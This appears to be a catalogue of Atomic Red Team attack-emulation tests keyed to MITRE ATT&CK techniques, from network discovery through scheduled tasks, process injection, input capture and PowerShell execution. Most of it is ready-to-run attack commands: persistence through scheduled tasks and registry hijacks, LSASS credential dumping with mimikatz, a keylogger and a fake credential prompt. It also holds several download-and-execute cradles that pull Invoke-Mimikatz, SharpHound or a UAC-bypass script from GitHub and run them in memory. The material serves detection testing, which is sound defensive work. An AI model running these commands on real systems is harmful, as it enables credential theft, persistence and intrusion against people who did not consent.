Enumerate TCP connections and map to owning process names via PowerShell.
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 powershell elevated windows System Discovery using SharpView
System Network Connections Discovery
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1053.002 command_prompt windows At.exe Scheduled task
At
Executes cmd.exe Note: deprecated in Windows 8+ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
at 13:20 /interactive cmd
T1053.005 command_prompt elevated windows Scheduled Task Startup Script
Scheduled Task
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane.
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
T1053.005 command_prompt windows Scheduled task Local
Scheduled Task
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
T1053.005 command_prompt elevated windows Scheduled task Remote
Scheduled Task
Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
T1053.005 powershell windows Powershell Cmdlet Scheduled Task
Scheduled Task
Create an atomic scheduled task that leverages native powershell cmdlets. Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
T1053.005 powershell windows Task Scheduler via VBA
Scheduled Task
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
T1053.005 powershell elevated windows WMI Invoke-CimMethod Scheduled Task
Scheduled Task
Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
T1053.005 command_prompt windows Scheduled Task Executing Base64 Encoded Commands From Registry
Scheduled Task
A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The scheduled task will launch powershell to decode and run the command in the registry daily. This is a persistence mechanism recently seen in use by Qakbot. [Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
T1053.005 powershell elevated windows Import XML Schedule Task with Hidden Attribute
Scheduled Task
Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
T1053.005 powershell windows PowerShell Modify A Scheduled Task
Scheduled Task
Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered. It will first be created to spawn cmd.exe, but modified to run notepad.exe. Upon successful execution, powershell.exe will create a scheduled task and modify the action.
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
T1053.005 command_prompt elevated windows Scheduled Task ("Ghost Task") via Registry Key Manipulation
Scheduled Task
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means. This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command. For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
T1053.005 command_prompt elevated windows Scheduled Task Persistence via CompMgmt.msc
Scheduled Task
Adds persistence by abusing compmgmt.msc via a scheduled task. When the Computer Management console is opened, it will run a malicious payload (in this case, calc.exe). This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes.
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
T1053.005 command_prompt elevated windows Scheduled Task Persistence via Eventviewer.msc
Scheduled Task
Adds persistence by abusing eventviewer.msc via a scheduled task. When the eventviewer console is opened, it will run a malicious payload (in this case, calc.exe).
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
T1055 powershell windows Shellcode execution via VBA
Process Injection
This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines. Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office is required.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
T1055 command_prompt windows Remote Process Injection in LSASS via mimikatz
Process Injection
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). Especially useful against domain controllers in Active Directory environments. It must be executed in the context of a user who is privileged on remote machine. The effect of /inject is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"
T1055 powershell windows Section View Injection
Process Injection
This test creates a section object in the local process followed by a local section view. The shellcode is copied into the local section view and a remote section view is created in the target process, pointing to the local section view. A thread is then created in the target process, using the remote section view as start address.
$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\InjectView.exe"
T1055 powershell windows Dirty Vanity process Injection
Process Injection
This test used the Windows undocumented remote-fork API RtlCreateProcessReflection to create a cloned process of the parent process with shellcode written in its memory. The shellcode is executed after being forked to the child process. The technique was first presented at BlackHat Europe 2022. Shellcode will open a messsage box and a notepad.
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\redVanity.exe" #{pid}
T1055 powershell elevated windows Read-Write-Execute process Injection
Process Injection
This test exploited the vulnerability in legitimate PE formats where sections have RWX permission and enough space for shellcode. The RWX injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory, thus evading detection mechanisms that relied on API call sequences and heuristics. The RWX injection utilises API call sequences: LoadLibrary -- GetModuleInformation -- GetModuleHandleA -- RtlCopyMemory -- CreateThread. The injected shellcode will open a message box and a notepad. RWX Process Injection, also known as MockingJay, was introduced to the security community by SecurityJoes. More details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution. The original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.
$address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
T1055 powershell windows Process Injection with Go using UuidFromStringA WinAPI
Process Injection
Uses WinAPI UuidFromStringA to load shellcode to a memory address then executes the shellcode using EnumSystemLocalesA. With this technique, memory is allocated on the heap and does not use commonly suspicious APIs such as VirtualAlloc, WriteProcessMemory, or CreateThread - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa) - References: - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/ - https://twitter.com/_CPResearch_/status/1352310521752662018 - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala
$PathToAtomicsFolder\T1055\bin\x64\UuidFromStringA.exe -debug
T1055 powershell windows Process Injection with Go using EtwpCreateEtwThread WinAPI
Process Injection
Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode within the application's process. This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. Steps taken with this technique 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 3. Change the memory page permissions to Execute/Read with VirtualProtect 4. Call EtwpCreateEtwThread on shellcode address 5. Call WaitForSingleObject so the program does not end before the shellcode is executed - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread) - References: - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3 - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm
$PathToAtomicsFolder\T1055\bin\x64\EtwpCreateEtwThread.exe -debug
T1055 powershell windows Remote Process Injection with Go using RtlCreateUserThread WinAPI
Process Injection
Executes shellcode in a remote process. Steps taken with this technique 1. Get a handle to the target process 2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write 3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process 4. Change the memory page permissions to Execute/Read with VirtualProtectEx 5. Execute the entrypoint of the shellcode in the remote process with RtlCreateUserThread 6. Close the handle to the remote process - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread) - References: - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
T1055 powershell windows Remote Process Injection with Go using CreateRemoteThread WinAPI
Process Injection
Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process. This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess(). Steps taken with this technique 1. Get a handle to the target process 2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write 3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process 4. Change the memory page permissions to Execute/Read with VirtualProtectEx 5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread 6. Close the handle to the remote process - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread) - References: - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
T1055 powershell windows Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
Process Injection
Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process. This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. 1. Get a handle to the target process 2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write 3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process 4. Change the memory page permissions to Execute/Read with VirtualProtectEx 5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread 6. Close the handle to the remote process - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
T1055 powershell windows Process Injection with Go using CreateThread WinAPI
Process Injection
This program executes shellcode in the current process using the following steps 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 3. Change the memory page permissions to Execute/Read with VirtualProtect 4. Call CreateThread on shellcode address 5. Call WaitForSingleObject so the program does not end before the shellcode is executed This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
$PathToAtomicsFolder\T1055\bin\x64\CreateThread.exe -debug
T1055 powershell windows Process Injection with Go using CreateThread WinAPI (Natively)
Process Injection
This program executes shellcode in the current process using the following steps 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 3. Change the memory page permissions to Execute/Read with VirtualProtect 4. Call CreateThread on shellcode address 5. Call WaitForSingleObject so the program does not end before the shellcode is executed This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
$PathToAtomicsFolder\T1055\bin\x64\CreateThreadNative.exe -debug
T1055 powershell elevated windows UUID custom process Injection
Process Injection
The UUIDs Process Injection code was first introduced by the NCC Group. The code can be stored in UUID forms on the heap and converted back to binary via UuidFromStringA at runtime. In this new custom version of UUID injection, EnumSystemLocalesA is the only API called to execute the code. We used custom UuidToString and UuidFromString implementations to avoid using UuidFromStringA and RPCRT4.dll, thereby eliminating the static signatures. This technique also avoided the use of VirtualAlloc, WriteProcessMemory and CreateThread The injected shellcode will open a message box and a notepad. Reference to NCC Group: https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/ Concept from: http://ropgadget.com/posts/abusing_win_functions.html
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
T1055.001 powershell elevated windows Process Injection via mavinject.exe
Dynamic-link Library Injection
Windows 10 Utility To Inject DLLS. Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING "#{dll_payload}"
Stop-Process -processname notepad
T1055.001 powershell windows WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
Dynamic-link Library Injection
Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
T1055.002 powershell elevated windows Portable Executable Injection
Portable Executable Injection
This test injects a portable executable into a remote Notepad process memory using Portable Executable Injection and base-address relocation techniques. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds.
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
T1055.003 powershell windows Thread Execution Hijacking
Thread Execution Hijacking
This test injects a MessageBox shellcode generated by msfvenom in Notepad.exe using Thread Execution Hijacking. When successful, a message box will appear with the "Atomic Red Team" caption after one or two seconds.
$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055.003\bin\InjectContext.exe"
Start-Sleep -Seconds 5
Stop-Process $notepad.id
T1055.004 command_prompt windows Process Injection via C#
Asynchronous Procedure Call
Process Injection using C# reference: https://github.com/pwndizzle/c-sharp-memory-injection Excercises Five Techniques 1. Process injection 2. ApcInjectionAnyProcess 3. ApcInjectionNewProcess 4. IatInjection 5. ThreadHijack Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout.
"#{exe_binary}"
T1055.004 powershell windows EarlyBird APC Queue Injection in Go
Asynchronous Procedure Call
Creates a process in a suspended state and calls QueueUserAPC WinAPI to add a UserAPC to the child process that points to allocated shellcode. ResumeThread is called which then calls NtTestAlert to execute the created UserAPC which then executes the shellcode. This technique allows for the early execution of shellcode and potentially before AV/EDR can hook functions to support detection. - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe) - References: - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/ - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection
$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}" -debug
T1055.004 powershell windows Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
Asynchronous Procedure Call
Uses the undocumented NtQueueAPCThreadEx WinAPI to create a "Special User APC" in the current thread of the current process to execute shellcode. Since the shellcode is loaded and executed in the current process it is considered local shellcode execution. Steps taken with this technique 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 3. Change the memory page permissions to Execute/Read with VirtualProtect 4. Get a handle to the current thread 5. Execute the shellcode in the current thread by creating a Special User APC through the NtQueueApcThreadEx function - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread) - References: - https://repnz.github.io/posts/apc/user-apc/ - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html - https://0x00sec.org/t/process-injection-apc-injection/24608 - https://twitter.com/aionescu/status/992264290924032005 - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505
$PathToAtomicsFolder\T1055.004\bin\x64\NtQueueApcThreadEx.exe -debug
T1055.011 powershell windows Process Injection via Extra Window Memory (EWM) x64 executable
Extra Window Memory Injection
Hooks functions of main process to inject a payload via Extra Window Memory (EWM) injection technique
#{exe_binary}
T1055.012 powershell windows Process Hollowing using PowerShell
Process Hollowing
This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
T1055.012 powershell windows RunPE via VBA
Process Hollowing
This module executes notepad.exe from within the WINWORD.EXE process
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
T1055.012 powershell windows Process Hollowing in Go using CreateProcessW WinAPI
Process Hollowing
Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process. - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program "#{hollow_binary_path}" -debug
T1055.012 powershell windows Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
Process Hollowing
Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process. This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe allows for the retrieval of output generated from executed shellcode. - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe -program "#{hollow_binary_path}" -debug
T1055.015 powershell elevated windows Process injection ListPlanting
ListPlanting
This test injects shellcode into a remote RegEdit process using the ListPlanting technique. ListPlanting exploits Window with ListView control. Code write to memory with NtWriteVirtualMemory. The shellcode is executed via PostMessage. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds. Notepad will open following the appearance of the message box.
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
T1056.001 powershell elevated windows Input Capture
Keylogging
Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) Upon successful execution, Powershell will execute Get-Keystrokes.ps1 and output to key.log.
&"$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1" -LogPath #{filepath}
T1056.002 powershell windows PowerShell - Prompt User for Password
GUI Input Capture
Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials. Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
# Creates GUI to prompt for password. Expect long pause before prompt is available.    
$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.
write-warning $cred.GetNetworkCredential().Password
T1056.004 powershell elevated windows Hook PowerShell TLS Encrypt/Decrypt Messages
Credential API Hooking
Hooks functions in PowerShell to read TLS Communications
mavinject $pid /INJECTRUNNING "#{file_name}"
Invoke-WebRequest #{server_name} -UseBasicParsing
T1057 command_prompt windows Process Discovery - tasklist
Process Discovery
Utilize tasklist to identify processes. Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout.
tasklist
T1057 powershell windows Process Discovery - Get-Process
Process Discovery
Utilize Get-Process PowerShell cmdlet to identify processes. Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout.
Get-Process
T1057 powershell windows Process Discovery - get-wmiObject
Process Discovery
Utilize get-wmiObject PowerShell cmdlet to identify processes. Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout.
get-wmiObject -class Win32_Process
T1057 command_prompt windows Process Discovery - wmic process
Process Discovery
Utilize windows management instrumentation to identify processes. Upon successful execution, WMIC will execute process to list processes. Output will be via stdout.
wmic process get /format:list
T1057 command_prompt windows Discover Specific Process - tasklist
Process Discovery
Adversaries may use command line tools to discover specific processes in preparation of further attacks. Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running.
tasklist | findstr #{process_to_enumerate}
T1057 powershell elevated windows Process Discovery - Process Hacker
Process Discovery
Process Hacker can be exploited to infiltrate system processes, identify weak points, or achieve unauthorized control over systems. However, its malicious use can often be flagged by security defenses, rendering it a perilous tool for illegitimate purposes.
Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"
T1057 powershell elevated windows Process Discovery - PC Hunter
Process Discovery
PC Hunter is a toolkit with access to hundreds of settings including kernels, kernel modules, processes, network, startup, and more. When abused, this tool can allow threat actors to effectively access sensitive processes, collect system information, and terminate security software.
Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"
T1057 command_prompt windows Launch Taskmgr from cmd to View running processes
Process Discovery
An adverary may launch taskmgr.exe with the /7 switch via command prompt to view processes running on the system. [Reference](https://github.com/trellix-enterprise/ac3-threat-sightings/blob/main/sightings/Sightings_Conti_Ransomware.yml)
taskmgr.exe /7
T1059 powershell windows AutoIt Script Execution
Command and Scripting Interpreter
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1059.001 command_prompt elevated windows Mimikatz
PowerShell
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
T1059.001 powershell windows Run BloodHound from local disk
PowerShell
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
T1059.001 powershell windows Run Bloodhound from Memory using Download Cradle
PowerShell
Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
T1059.001 powershell elevated windows Mimikatz - Cradlecraft PsSendKeys
PowerShell
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
T1059.001 command_prompt windows Invoke-AppPathBypass
PowerShell
Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
